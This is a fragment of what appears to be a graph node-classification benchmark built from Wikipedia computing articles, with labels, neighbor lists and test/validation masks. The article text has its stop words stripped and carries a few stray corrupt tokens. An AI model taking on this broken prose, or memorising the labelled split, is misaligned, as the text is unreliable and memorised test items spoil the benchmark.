    "text": "Scriptcase:scriptcase scriptcase rad development platform php applications web oriented installed server internet acts like platform developers allows use graphical interface directly web browser automatically generate codes developed netmake year 2000 used mac windows linux operating system using scriptcase php developers generate complete online applications scriptcaseis rapid web development tool aims reduce development time increase productivity developers need xamp like environment web server like apache incl php dabase like mysql browser desktop accessible via network internet develop applications hosting applications server needs webserver incl php database programs finally developed deployed scriptcase longer necessary run application scriptcase used create crud create read update delete applications also enables add custom code manage business rules validation scriptcase lets create forms queries php ranging simple forms forms high level complex elements manipulate data databases mysql postgresql sqlite interbase firebird access oracle ms sqlserver db2 sybase informix odbc connections permits development javascript methods used within ajax events create applications ajax set features services easy fast hand coding navigation pages sections automatic validation fields date currency zip code social security number among others generated reports exported ms word ms excel pdf printed complex sql statements used sub-select joins even stored procedures scriptcase allows users write php handle exceptions create complex validation scriptcase compatible rtl right left writing support right left writing prevalent arabic languages also possible create infrastructure menus login screen security system authentication create tabs group forms queries executed page platform development began 2000 since receiving regular updates addresses web application developers desktops mobiles two ways enables starting developers limited knowledge programming php java basic knowledge databases sql build applications reads updates data web databases also aims experienced developer scriptcase put lot focus business logic rather editing forms build database connections etc pricing model shift buying software till end 2016 lease service 2016 due publication ceo subscribers current users scriptcase nov 14th 2016 prices currently 400- 600 buying software depending many databases supported per developer platform development started 2000 since tool received periodic updates improvements -was sold customers beta mode -big changes interface -native support ajax -internationalization support -graphics flash -new implementations jquery support -focused editing field types creating option edit fields -the biggest change performance 5 times faster -integration paypal -multi-thread processing scriptcase consolidation one strongest tools bi business intelligence migrating features help end user make decisions made major changes grid application option end users create group within application based fields defined developer add totals create graphics addition new graphic application added simplify creation applications implemented new filter functionality dynamic summary grid applications created new graphic application support user-defined combined final graphics new refined filter restricting values according universe exists database group buttons new chart toolbar button editor comes important implementations business intelligence complete redesign charts grids abstracts – pivot tables dashboards significant improvements security pdf report module menu interface redesign development improvement performance php7 among implementations scriptcase still allows advanced settings generated applications meet requirements complex systems also documentation generator integrate whole team",
    "neighbors": [
      6850,
      7523,
      8644,
      10340,
      522,
      5546,
      9389,
      7022,
      7983,
      10413,
      8539,
      8627,
      119,
      11030,
      823,
      3096,
      5403
    ],
    "mask": "None"
  },
  {
    "node_id": 5550,
    "label": 1,
    "text": "Load_file:load file load file litigation community commonly referred file used import data coded captured extracted data esi processing database file used link images load files carry commands commanding software carry certain functions data found load files usually ascii text files delimited fields information load files may data documents imported document management software concordance summation may path directory images may reside software link images corresponding records database programs take one load file importing images another importing data others take one load file pieces information ocr search-able text considered data also imported database programs via load files though people prefer load ocr databases running separate command search find desired text commonly used databases corresponding file extensions summation dii csv concordance opt dat sanction sdt ipro lfp ringtail mdb db/textworks txt",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      5857,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 5551,
    "label": 9,
    "text": "SYMPL:sympl sympl obsolete programming language developed control data corporation cdc use cdc 6000 series computer systems 1970s 1980s based subset cdcs version jovial alternative assembly language number important cdc software products implemented sympl including compilers libraries full-screen editor major subsystems sympl compiled imperative procedural language compared fortran day sympl supports simplifications compared jovial include fewer built-in data types recursive calls procedures codice_1 concept",
    "neighbors": [
      3960,
      8262,
      4998,
      10089
    ],
    "mask": "None"
  },
  {
    "node_id": 5552,
    "label": 6,
    "text": "Encryption_layer_in_storage_stack:encryption layer storage stack a0kq 9t4x mf5y x32a rhns 0p92 aecx 5ed5 plurality terms used describe implementations disk encryption on-the-fly encryption otfe full disk encryption fde whole disk encryption filesystem-level encryption encrypted filesystem cryptographic filesystem etc refer encryption layer storage stack article describes techniques explains pros cons article reference software hardware implementing techniques see disk encryption software hardware describe cryptographic theory behind see disk encryption theory fully understand techniques listed first need consider stack software hardware computer storage subsystem let us give example stack pc hard disk hardware provides interface read write sectors using logical block addressing lba cylinder-head-sector chs address top software layer interprets partition table stored master boot record mbr represents single hard disk set logical disks top another software layer filesystem represent logical disk collection files organized directories top may software text editor interprets file list text lines layer stack provides interface using interface provided layer example lba-accessible disk logical disk allow read write sectors fixed size given sector number layers called sector-addressable filesystem allows read write data arbitrary length given name file offset inside file text editor allows delete insert characters text file similar communication protocol stack modularity provides great flexibility layer easily replaced another far provides interface example hard disk replaced flash memory rest stack stays unchanged also possible introduce additional layer provides interface layer change data along way example provide on-the-fly encryption decryption encryption layer integrated layer example encryption implemented hardware hard disk single logical disk encrypted file encrypted filesystem even text editor transparently encrypt data storing file terms listed beginning article refer encryption layer different positions unfortunately naming conventions different different speakers general every method data transparently encrypted write decrypted read called on-the-fly encryption otfe although prefer use name encryption sector-addressable layer full disk encryption fde whole disk encryption used refer encryption sector-addressable layer physical disk logical disk whereas others use denote encryption physical disk logical disk filesystem-level encryption cryptographic filesystem used refer filesystem selectively encrypt files stored whereas others distinguish terms use former denote general purpose filesystem supports encryption use latter denote filesystem specifically designed provide encryption uses filesystem store files since many cases people mistakenly assume collocutor assigns meaning terms lot arguments whether particular implementation provides particular feature example one contrasts “ full disk encryption ” “ filesystem-level encryption ” may say software package provides fde whereas opponent contrasts “ fde ” “ logical disk encryption ” “ disk partition encryption ” say package provide fde article explains getting argument important understand meaning speaker assigns terms",
    "neighbors": [
      672,
      9762,
      5797,
      6309,
      1801,
      7794,
      4563,
      3572,
      3382,
      7229
    ],
    "mask": "Test"
  },
  {
    "node_id": 5553,
    "label": 7,
    "text": "Zuora:zuora zuora enterprise software company creates provides software businesses launch manage subscription-based services zuora ’ applications designed automate recurring billing collections quoting revenue recognition subscription metrics tien tzuo founder company served ceo since 2007 2007 k.v rao cheng zou engineers webex tien tzuo early executive salesforce founded zuora name company derives combination three surnames concept behind company cloud-based billings platform alleviate need online businesses develop billing systems march 16 2018 company filed initial public offering april 12 2018 zuora listed nyse ticker symbol zuo company generated 154 million offering entered market public company 1.4 billion valuation end april 2018 company valued 2 billion 2016 zuora launched subscription economy index tracks revenue growth subscription businesses comparing growth sales benchmarks index based data hundreds businesses zuora platform index updated twice year zuora hosts conference series called subscribed covering topics related subscription economy taking place various cities year may 20 2015 zuora acquired frontleaf launched z-insights combining information subscriber invoicing billing platform customer usage information 2017 zuora purchased leeyo software revenue recognition platform december 17 2007 zuora announced raised 6 million series funding zuora announced 15 million series b funding september 15 2008 20 million series c funding october 2010 36 million series funding november 4 2011 50 million series e funding september 5 2013 115 million series f funding march 11 2015 bringing total funding 250 million investors include benchmark capital greylock partners redpoint ventures index ventures shasta ventures vulcan capital next world capital private investors include founder ceo salesforce marc benioff former peoplesoft vice-chair founder co-ceo workday dave duffield zuora sells subscription management saas platform businesses utilizing subscription-service model zuora central platform lets companies keep track subscription payments billing collections pricing product catalogs accounting addition zuora central zuora four primary saas applications zuora billing recurring billing operations zuora revpro revenue automation zuora cpq sales quoting subscription businesses zuora collect payment collections zuora app marketplace zuora connect allows partners develop list apps built zuora central platform june 5 2018 zuora announced subscription order management designed help customers process renewals complex deals addresses shift subscription growth related acquiring new customers growth existing customers",
    "neighbors": [
      10090,
      1259,
      11646
    ],
    "mask": "None"
  },
  {
    "node_id": 5554,
    "label": 4,
    "text": "Cardkey:cardkey cardkey producer electronic access control products based simi valley california first company develop widely distribute electronic access control systems company original readers used cards made barium ferrite worked magnetically attracting repelling locking/unlocking cores within reader module mechanism cards primarily used fraternal organizations clubs bpoe elks others first develop wiegand cards readers magnetically based reliable require calibration used barium ferrite readers cards readers highly programmable used applications ranging adt american district telegraph government installations worldwide uk offices manchester reading sold systems companies british telecom shell bp main facility cardkey located nordhoff mason chatsworth additional location cozycroft chatsworth housed customer engineering singular engineering project pass system approximately 1978 division greer hydraulics inc. january 1999 bought johnson controls company whose founder invented electric room thermostat late 1800s",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5555,
    "label": 2,
    "text": "Robert_J._Chassell:robert j. chassell robert bob chassell one founding directors free software foundation fsf 1985 board directors chassell also treasurer fsf left fsf become full-time speaker free software topics bob born 22 august 1946 bennington vt diagnosed progressive supranuclear palsy psp 2010 died result 30 june 2017 chassell authored several books including",
    "neighbors": [
      2050,
      1028,
      2180,
      4230,
      11654,
      9865,
      4493,
      1939,
      2332,
      10012,
      3744,
      802,
      3618,
      4265,
      11180,
      6962,
      2233,
      9148,
      10687,
      8258,
      10822,
      5703,
      5833,
      4561,
      8147,
      1112,
      3674,
      2010,
      7904,
      8673,
      9696,
      10464,
      3817,
      9579,
      1007,
      8304,
      1394,
      8436,
      3068,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 5556,
    "label": 3,
    "text": "Match_Day_(series):match day series match day association football video game franchise created jon ritman 1984 1980s 8-bit home computer market following games part match day series games published ocean exception super match soccer",
    "neighbors": [
      325,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5557,
    "label": 2,
    "text": "GOFF:goff goff generalized object file format specification developed ibm zsystem mainframe computer supersede ibm os/360 object file format compensate weaknesses older format original ibm os/360 object file format developed 1964 new ibm system/360 mainframe computer format also used makers plug compatible workalike mainframes including univac 90/60 90/70 90/80 fujitsu b2800 format expanded add symbolic records expanded information modules plus support procedures functions names longer 8 characters helped provide enhanced information necessary today complicated programming languages advanced features objects properties methods unicode support virtual methods goff object file format developed ibm approximately 1995 means overcome problems note os/360 object file format simply superseded goff format deprecated still use assemblers language compilers language withstand limitations older format note article use term module refer name equivalent symbol used provide identifier piece code data external scope referenced module may refer subroutine function method property object class named routine identifier external particular scope referencing external name format similar os/360 object file format adds additional information use building applications similarly older os/360 format object file records divided 6 different record types added deleted altered goff records may fixed variable length minimum length using variable-length records 56 characters although records longer except module class names characters ebcdic character set unix-based systems must use fixed-length 80-byte records records fixed-length files shorter fixed length zero-filled distinguish goff records older os/360 format commands may present file first byte goff record always binary value x'03 commands must start character value least space x'40 next 2 bytes goff record indicate record type continuation version file format first 3 bytes known ptv field ptv field represents first 3 bytes every goff record hdr record required must first record esd record gives public name module main program subroutine procedure function property method object fortran common alternate entry point esd record public name must present file reference name made record case fixed-length records name requires continuation records following used adata associated data records used provide additional symbol information module replaced older sym records 360 object file format create adata record adata records appended end class order declared class names assigned adata records translated ibm programs converting binary value text appending name c_adata item numbered x'0033 would become text string c_adata0033 txt records specify machine code instructions data placed specific address location module note wherever length must specified record length value must include continuations record compression table used bytes 20-21 txt record nonzero r value used determine number times repeat string l value indicates length text repeated r times could used pre-initializing tables arrays blanks zero purpose useful express repeated data repeat count value note unlike number values stored goff file version release trans_date values numbers text characters instead binary normally compilers assemblers generate format record typically created binder text item character data binary information used rld records allow module show references address must relocated references specific locations external modules clarify module c program named basura issue call exit function terminate r_pointer address would esdid routine exit p_pointer would esdid basura len records used declare length module known time esd record created e.g one-pass compilers deferred-length element entry continued split end must last record module 'entry point used address beginning module used start point execution used either program non-executable data appearing start module common older assembly programmers older versions assembler much slower assemble data stored programs instructions specified module calls external module first run-time library initialize entry-point name specified fixed-length end record longer 54 bytes record also continued longer additional 80 bytes following continuation record used",
    "neighbors": [
      1922,
      4712,
      6664,
      6921,
      8524,
      10508,
      2672,
      3410,
      3443,
      2804,
      5492,
      8502,
      7607,
      3960,
      3386,
      2045,
      2942,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 5558,
    "label": 1,
    "text": "Alexander_Street_Press:alexander street press alexander street press asp electronic academic database publisher founded may 2000 alexandria virginia stephen rhind-tutt president janice cronin cfo eileen lawrence vice president sales marketing january 2016 company grown 100 employees offices united states australia brazil china united kingdom june 2016 acquired proquest company first product north american women letters diaries collection 150,000 pages letters diaries women colonial times 1950s 2000 collaboration artfl project university chicago company began using semantic indexing techniques humanities databases created metadata elements gender age sexual orientation characters within plays author nationality birthplace deathplace well item written elements combined full-text search allow material analyzed new ways 2003 company began major partnership center historical study women gender state university new york publish women social movements united states 1600–2000 subsequently become leading site study women history november 2004 alexander street acquired principal assets classical international london new york-based publisher streaming music libraries led new range music publications including partnership smithsonian institution provide smithsonian global sound libraries african american song november 2005 alexander street acquired range religious products produced ad fontes including digital library classic protestant texts digital library catholic reformation october 2006 company acquired assets university music editions small microfilm publisher specializing publication scores journals musically oriented publications collections subsequently released part classical scores library late 2006 company began developing online collections video theatre video published april 2007 followed succession online streaming video collections using techniques semantic indexing initially developed textual databases early provider synchronized scrolling transcripts allow watcher read ahead 2010 midsummer american library association company advertised 9 streaming video collections spanning 9,000 individual video titles april 2007 alexander street acquired principal products harpweek publisher harper weekly lincoln civil war june 2009 alexander street press arcadia publishing launched research website college local history information around united states canada september 2010 alexander street acquired microtraining associates specialist producer distributor therapy counseling videos december 2010 company acquired filmakers library distributor issue based documentaries 2011 alexander street acquired documentary film distributor filmmakers library 2012 acquired principal assets asia pacific films november 2013 alexander street announced acquisition insight media new york-based vendor dvd streaming media bringing asp catalog 50,000 academic video titles one first largest independent surveys streaming video north american academic libraries deg farrelly arizona state university jane hutchison william paterson university alexander street emerged leading vendor used 60 sites insight media present 10 sites 2013 company launched series case study databases combine books audio video reports pamphlets primary sources first two engineering case studies online documented major accidents 20th century psychological experiments online documented seminal experiments humans 2015 company secured arrangement cbs publish episodes sixty minutes 1996 2014 also announced open access initiatives anthropology anthropology commons music open music library following june alexander street press acquired proquest renamed alexander street proquest company 2016 company principal products academic video online 50,000 academically oriented video titles music online collection 8.3 million tracks music together scores reference works 120 primary source collections offerings across curriculum 60,000 video titles materials made available using wide range business models including demand driven access-to-own eba pda subscriptions perpetual licenses",
    "neighbors": [
      10270
    ],
    "mask": "Test"
  },
  {
    "node_id": 5559,
    "label": 5,
    "text": "IP_Flow_Information_Export:ip flow information export internet protocol flow information export ipfix ietf protocol well name ietf working group defining protocol created based need common universal standard export internet protocol flow information routers probes devices used mediation systems accounting/billing systems network management systems facilitate services measurement accounting billing ipfix standard defines ip flow information formatted transferred exporter collector previously many data network operators relying cisco systems proprietary netflow technology traffic flow information export ipfix standards requirements outlined original rfc 3917 cisco netflow version 9 basis ipfix basic specifications ipfix documented rfc 7011 rfc 7015 rfc 5103 following figure shows typical architecture information flow ipfix architecture pool metering processes collects data packets one observation points optionally filters aggregates information packets exporter gathers observation points together observation domain sends information via ipfix protocol collector exporters collectors many-to-many relationship one exporter send data many collectors one collector receive data many exporters similar netflow protocol ipfix considers flowưởuoz number packets observed specific timeslot sharing number properties e.g source destination protocol using ipfix devices like routers inform central monitoring station view potentially larger network ipfix push protocol i.e sender periodically send ipfix messages configured receivers without interaction receiver actual makeup data ipfix messages great extent sender ipfix introduces makeup messages receiver help special templates sender also free use user-defined data types messages protocol freely extensible adapt different scenarios ipfix prefers stream control transmission protocol sctp transport layer protocol also allows use transmission control protocol tcp user datagram protocol udp simple information set sent via ipfix might look like information set would sent following ipfix message seen message contains ipfix header two ipfix sets one template set introduces build-up data set used well one data set contains actual data ipfix sent protocol keeps session state tcp sctp template set need retransmitted since buffered collectors since template set change time must retransmitted new session state established ipfix sent udp session-less protocol",
    "neighbors": [
      5472,
      10055,
      10924,
      6993,
      6834,
      7860,
      11413,
      3006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5560,
    "label": 1,
    "text": "LevelDB:leveldb leveldb open-source on-disk key-value store written google fellows jeffrey dean sanjay ghemawat inspired bigtable leveldb hosted github new bsd license ported variety unix-based systems macos windows android leveldb stores keys values arbitrary byte arrays data sorted key supports batching writes forward backward iteration compression data via google snappy compression library leveldb sql database like nosql dbm stores relational data model support sql queries also support indexes applications use leveldb library provide server command-line interface mariadb 10.0 comes storage engine allows users query leveldb tables mariadb leveldb based concepts google bigtable database system table implementation bigtable system developed starting 2004 based different google internal code base leveldb code code base relies number google code libraries open sourced directly open sourcing code would difficult jeff dean sanjay ghemawat wanted create system resembling bigtable tablet stack minimal dependencies would suitable open sourcing also would suitable use chrome indexeddb implementation wrote leveldb starting early 2011 general design bigtable tablet stack sharing code leveldb used backend database google chrome indexeddb one supported backends riak additionally bitcoin core go-ethereum stores blockchain metadata using leveldb database minecraft pocket edition uses modified version chunk entity data storage autodesk autocad 2016 also uses leveldb google provided benchmarks comparing leveldb performance sqlite kyoto cabinet different scenarios leveldb outperforms sqlite kyoto cabinet write operations sequential-order read operations leveldb also excels batch writes slower sqlite dealing large values currently published benchmarks updated sqlite configuration mistakes noted earlier version results updated benchmarks show leveldb also outperforms berkeley db tests also show openldap lightningdb much faster ~10 times scenarios read operations write types e.g batch synchronous writes see link almost equal rest test leveldb history database corruption bugs study 2014 found older file systems database could become corrupted crash power failure",
    "neighbors": [
      1156,
      7816,
      11017,
      6797,
      19,
      2966,
      2456,
      10921,
      5546,
      10413,
      10292,
      9397,
      1594,
      2234,
      6851,
      11221,
      3427,
      8683,
      5492
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5561,
    "label": 4,
    "text": "Secure_transmission:secure transmission computer science secure transmission refers transfer data confidential proprietary information secure channel many secure transmission methods require type encryption common email encryption called pki order open encrypted file exchange keys done many infrastructures banks rely secure transmission protocols prevent catastrophic breach security secure transmissions put place prevent attacks arp spoofing general data loss software hardware implementations attempt detect prevent unauthorized transmission information computer systems organization outside may referred information leak detection prevention ildp information leak prevention ilp content monitoring filtering cmf extrusion prevention systems used connection methods ensure secure transmission data wep deprecated algorithm secure ieee 802.11 wireless networks wireless networks broadcast messages using radio susceptible eavesdropping wired networks introduced 1999 wep intended provide confidentiality comparable traditional wired network later system called wi-fi protected access wpa since developed provide stronger security transport layer security tls predecessor secure sockets layer ssl cryptographic protocols provide secure communications internet things web browsing e-mail internet faxing instant messaging data transfers slight differences ssl tls substantially",
    "neighbors": [
      3629,
      10831,
      10329,
      10332,
      6013,
      2558,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 5562,
    "label": 2,
    "text": "Time_Sharing_Option:time sharing option time sharing option tso interactive time-sharing environment ibm mainframe operating systems including os/360 mvt os/vs2 svs mvs os/390 z/os time-sharing means many people access operating system concurrently unaware others also accessing operating system appears tso user user system tso commonly used mainframe system administrators programmers provides tso interacts users either line-by-line mode full screen menu-driven mode line-by-line mode user enters commands typing keyboard turn system interprets commands displays responses terminal screen mainframe interaction actually via ispf allows customized menu-driven interaction combination called tso/ispf tso also provide unix-style environment os/390 z/os via unix system services command shell without ispf tso commands embedded rexx execs clists run interactively batch tso eliminated need punch cards keypunch machine send card decks computer room read card reading machine originally introduced 1971 ibm considered time-sharing optional feature compared standard batch processing hence offered tso option os/360 mvt introduction mvs 1974 ibm made standard component top-end mainframe operating system tso/e time sharing option/extensions set extensions original tso tso/e base element z/os z/os tso extensions tso/e element os/390 licensed program mvs mvs/esa system products since z/os installations usually tso tso/e functions installed normal refer tso tso/e tso first released tso module names always prefix ikj plus second third letters associated pre-tso functional group iea original functional group supervisor hence tso module name ikjeaxxx ieb original functional group dataset utilities hence tso module name ikjebxxx etc. common run tso batch opposed interactively usual tso line-mode interactive commands also executed via job control language jcl running programs codice_1 codice_2 codice_3 supplying line commands file pointed codice_4 primary difference three programs handling return codes executed commands batch execution tso one way allow ibm mainframe application access db2 resources",
    "neighbors": [
      6529,
      10883,
      2181,
      10508,
      909,
      7053,
      15,
      8077,
      9361,
      11024,
      9468,
      789,
      5397,
      6678,
      11673,
      9370,
      6557,
      3358,
      3359,
      421,
      7848,
      8879,
      7217,
      11442,
      10803,
      7477,
      7733,
      10040,
      11450,
      573,
      2625,
      4546,
      1219,
      8388,
      11075,
      6342,
      8136,
      1235,
      7507,
      2519,
      8154,
      863,
      868,
      3429,
      9829,
      6503,
      6248,
      10094,
      5492,
      2168,
      2172,
      2813,
      8063
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5563,
    "label": 4,
    "text": "FireEye:fireeye fireeye publicly traded cybersecurity company headquartered milpitas california provides hardware software services investigate cybersecurity attacks protect malicious software analyze security risks fireeye founded 2004 initially focused developing virtual machines would download test internet traffic transferring corporate government network company diversified time part acquisitions 2014 acquired mandiant provides incident response services following identification security breach fireeye went public 2013 usatoday says fireeye called investigate high-profile attacks target jp morgan chase sony pictures anthem others yahoo finance says fireeye fastest-growing cyber security firm according deloitte fireeye founded 2004 ashar aziz former sun microsystems engineer received early investment cia investment arm in-q-tel 2009 fireeye first commercial product developed sold 2010 year fireeye expanded middle-east followed opening new offices asia pacific 2010 europe 2011 africa 2013 december 2012 founder aziz stepped ceo former mcafee ceo david dewalt appointed position dewalt recruited order prepare company initial public offering ipo following year fireeye raised additional 50 million venture capital bringing total funding 85 million late 2013 fireeye went public raising 300 million time fireeye growing rapidly 175 employees 2011 grew 900 june 2012 revenues multiplied eight-fold 2010 2012 however fireeye yet profitable due high operating costs research development expenses january 2014 fireeye acquired mandiant 1 billion mandiant private company founded 2004 kevin mandia provided incident response services event data security breach mandiant known investigating high-profile hacking groups acquisition fireeye would often identify security breach partner mandiant investigate hackers mandiant became subsidiary fireeye late 2014 fireeye initiated secondary offering selling another 1.1 billion shares order fund development wider range products shortly afterward fireeye acquired another data breach investigation company npulse approximately 60 million 2015 fireeye making 100 million annual revenue still unprofitable largely due research development spending january 2016 fireeye acquired isight partners 275 million isight threat intelligence company gathered information hacker groups cybersecurity risks followed acquisition invotas security automation company dewalt stepped ceo 2016 replaced mandiant ceo former fireeye president kevin mandia afterwards downsizing restructuring response lower-than-expected sales resulting layoff 300-400 employees afterwards profit revenue increased account shifts subscription model lower costs fireeye started sandboxing company sandboxing incoming network traffic opened within virtual machine test malicious software introduced network fireeye products diversified time part acquisitions 2017 fireeye transitioned primarily selling appliances software-as-a-service model fireeye sells technology products including network email endpoint security platform managing security operations centers called helix consulting services primarily based incident response threat intelligence products central management system cms consolidates management reporting data sharing web mps malware protection system email mps file mps malware analysis system mas single network-based appliance acting distribution hub malware security intelligence fireeye cloud crowd-sources dynamic threat intelligence dti detected individual fireeye mps appliances automatically distributes time sensitive zero-day intelligence globally subscribed customers frequent updates content updates include combination dti fireeye labs generated intelligence identified research efforts fireeye known uncovering high-profile hacking groups october/november 2009 fireeye participated effort take mega-d botnet also known ozdok march 16 2011 rustock botnet taken action microsoft us federal law enforcement agents fireeye university washington july 2012 fireeye involved analysis grum botnet command control servers located netherlands panama russia 2013 mandiant acquired fireeye uncovered multi-year espionage effort chinese hacking group called apt1 2014 fireeye labs team identified two new zero-day vulnerabilities – cve-2014-4148 cve-2014-4113 – part limited targeted attacks major corporations zero-days exploit windows kernel microsoft addressed vulnerabilities october 2014 security bulletin also 2014 fireeye provided information threat group calls fin4 fin4 appears conduct intrusions focused single objective obtaining access insider information capable making breaking stock prices public companies group targeted hundreds companies specifically targets emails c-level executives legal counsel regulatory risk compliance personnel individuals would regularly discuss confidential market-moving information also 2014 fireeye released report focused threat group refers apt28 apt28 focuses collecting intelligence would useful government specifically fireeye found since least 2007 apt28 targeting privileged information related governments militaries security organizations would likely benefit russian government 2015 fireeye confirmed existence least 14 router implants spread across four different countries ukraine philippines mexico india referred synful knock implant stealthy modification router ’ firmware image used maintain persistence within victim ’ network september 2015 fireeye obtained injunction security researcher attempting report vulnerabilities fireeye malware protection system 2015 fireeye uncovered attack exploiting two previously unknown vulnerabilities one microsoft office cve-2015-2545 another windows cve-2015-2546 attackers hid exploit within microsoft word document .docx appeared résumé combination two exploits grant fully privileged remote code execution vulnerabilities patched microsoft 2015 fireeye service team singapore uncovered phishing campaign exploiting adobe flash player zero-day vulnerability cve-2015-3113 adobe released patch vulnerability out-of-band security bulletin fireeye attributed activity china-based threat group tracks apt3 2016 fireeye announced tracking pair cybercriminals referred “ vendetta brothers. ” company said enterprising duo uses various strategies compromise point-of-sale systems steal payment card information sell underground marketplace “ vendetta world. ” mid-2016 fireeye released report impact 2015 agreement former u.s. president barack obama chinese president xi jinping neither government would “ conduct knowingly support cyber-enabled theft intellectual property ” economic advantage security firm reviewed activity 72 groups suspects operating china otherwise support chinese state interests determined mid-2014 overall decrease successful network compromises china-based groups organizations u.s. 25 countries 2016 fireeye announced identified several versions ics-focused malware – dubbed irongate – crafted manipulate specific industrial process running within simulated siemens control system environment although siemens product computer emergency readiness team productcert confirmed fireeye irongate viable operational siemens control systems irongate exploit vulnerabilities siemens products security firm said irongate invokes ics attack concepts first seen stuxnet may 8 2016 fireeye detected attack exploiting previously unknown vulnerability adobe flash player cve-2016-4117 security firm reported issue adobe product security incident response team psirt adobe released patch vulnerability four days later 2016 fireeye discovered widespread vulnerability affecting android devices permits local privilege escalation built-in user “ radio ” making attacker potentially perform activities viewing victim ’ sms database phone history fireeye reached qualcomm january 2016 subsequently worked qualcomm product security team address issue 2016 fireeye provided details fin6 cyber criminal group steals payment card data monetization targets predominately hospitality retail sectors group observed aggressively targeting compromising point-of-sale pos systems making millions payment card numbers later sold underground marketplace fireeye firm mandiant hired russia alfa bank locate information connections u.s. president donald trump servers also hired equifax determine source data breach cases mandiant find anything conclusive 2017 fireeye detected malicious microsoft office rtf documents leveraging previously undisclosed vulnerability cve-2017-0199 vulnerability allows malicious actor download execute visual basic script containing powershell commands user opens document containing embedded exploit fireeye shared details vulnerability microsoft coordinated public disclosure timed release patch microsoft address vulnerability 2018 fireeye helped facebook identify 652 fake accounts",
    "neighbors": [
      3843,
      5764,
      9862,
      9863,
      7441,
      2325,
      2717,
      1954,
      3235,
      2090,
      2733,
      5886,
      704,
      9665,
      8133,
      10952,
      9052,
      3933,
      1886,
      8288,
      7522,
      1254,
      5866,
      10348,
      1645,
      4462,
      7418,
      763,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5564,
    "label": 9,
    "text": "ObjVlisp:objvlisp objvlisp 1984 object-oriented extension vlisp–vincennes lisp lisp dialect developed since 1971 university paris viii – vincennes noteworthy one earliest implementations concept metaclasses particular explicit opposed implicit metaclasses objvlisp model entity instance single class classes instances classes called metaclasses model allows extension static part ool i.e structural aspects objects considered implementation abstract data types objvlisp provided far flexible metaclass model provided earlier object-oriented languages especially smalltalk smalltalk-80 whenever new class created corresponding metaclass created automatically name independent metaclass created–metaclasses implicit rather explicit contrast objvlisp possible define named metaclasses defining class one must specify named metaclass instantiate explicit metaclass support objvlisp influenced provision capability common lisp object system objvlisp object model later implemented prolog produce objvprolog python converge implement meta-class system equivalent objvlisp",
    "neighbors": [
      8421,
      8262,
      8554,
      9877,
      10712
    ],
    "mask": "Test"
  },
  {
    "node_id": 5565,
    "label": 6,
    "text": "Common_filesystem_features:common filesystem features glossary common filesystem features table intention table provide at-a-glance list features specifications filesystem list names credited design filesystem specification include responsible writing implementation full non abbreviated name filesystem name operating system filesystem debuted partitioning scheme marker used identify partition formatted filesystem describe filesystem allocates isolates bad sectors describes filesystem allocates sectors in-use files describes subdirectories implemented lists characters legal within file directory names maximum number characters file directory name may contain maximum number files filesystem handle maximum size volume filesystem specification handle may differ maximum size operating system supports using given implementation filesystem type dates times filesystem support may include date file “ created ” volume change working normally file e.g opening closing saving modifying file date file last accessed access move open simple access also tripped anti-virus scanners windows system processes therefore caution used stating “ file last accessed user xxx ” “ file access ” date ntfs work date shown windows change file e.g notepad document data added would trip date modified date time related attributes modified may include acls file/directory name date time file last backed maximum year handled filesystem per specification lists basic file attributes available determines filesystems supports multiple data streams ntfs refers alternate data streams hpfs extended attributes hfs calls forks filesystem support real-time transparent compression decompression entire volume filesystem support real-time transparent encryption decryption entire volume filesystem support real-time transparent compression decompression individual files filesystem support real-time transparent encryption decryption individual files filesystem support multi-user access control lists acls",
    "neighbors": [
      2193,
      8114
    ],
    "mask": "Test"
  },
  {
    "node_id": 5566,
    "label": 4,
    "text": "Timestamping_(computing):timestamping computing computing timestamping refers use electronic timestamp provide temporal order among set events timestamping techniques used variety computing fields network management computer security concurrency control instance heartbeat network uses timestamping monitor nodes high availability computer cluster timestamping computer files updating timestamp per-file metadata every time file modified makes possible use efficient build automation tools",
    "neighbors": [
      9762,
      11684,
      5482,
      4274,
      950,
      7446,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5567,
    "label": 9,
    "text": "JRuby:jruby jruby implementation ruby programming language atop java virtual machine written largely java free software released three-way epl/gpl/lgpl license jruby tightly integrated java allow embedding interpreter java application full two-way access java ruby code similar jython python language jruby lead developers charles oliver nutter thomas enebo many current past contributors including ola bini nick sieger september 2006 sun microsystems hired enebo nutter work jruby full-time june 2007 thoughtworks hired ola bini work ruby jruby july 2009 jruby developers left sun continue jruby development engine yard may 2012 nutter enebo left engine yard work jruby red hat jruby originally created jan arne petersen 2001 time several years following code direct port ruby 1.6 c code release ruby 1.8.6 effort began update jruby 1.8.6 features semantics since 2001 several contributors assisted project leading current core team around six members jruby 1.1 added just-in-time compilation ahead-of-time compilation modes jruby already faster cases then-current ruby 1.8.7 reference implementation jruby packages available platforms fedora 9 among first include standard package jruby 1.1.1 july 2009 core jruby developers sun microsystems charles oliver nutter thomas enebo nick sieger joined engine yard continue jruby development may 2012 nutter enebo left engine yard work jruby red hat jruby supported compatibility ruby mri versions 1.6 1.9.3 jruby 1.0 supported ruby 1.8.6 jruby 1.4.0 updating compatibility ruby 1.8.7 jruby 1.6.0 added simultaneous support ruby 1.9.2 jruby 1.7.0 making ruby 1.9.3 default execution mode ruby 1.8.7 compatibility available via command-line flag jruby 9.0.0.0 added support ruby 2.2 jruby able run ruby rails web framework since version 0.9 may 2006 ability execute rubygems webrick since hiring two lead developers sun rails compatibility speed improved greatly jruby version 1.0 successfully passed nearly rails test cases since developers begun use jruby rails applications production environments february 27 2008 sun microsystems university tokyo announced joint-research project implement virtual machine capable executing one ruby jruby application one interpreter jsr 292 supporting dynamically typed languages javatm platform proposes sun open source project multi language virtual machine aims prototype jsr first working prototype developed patch 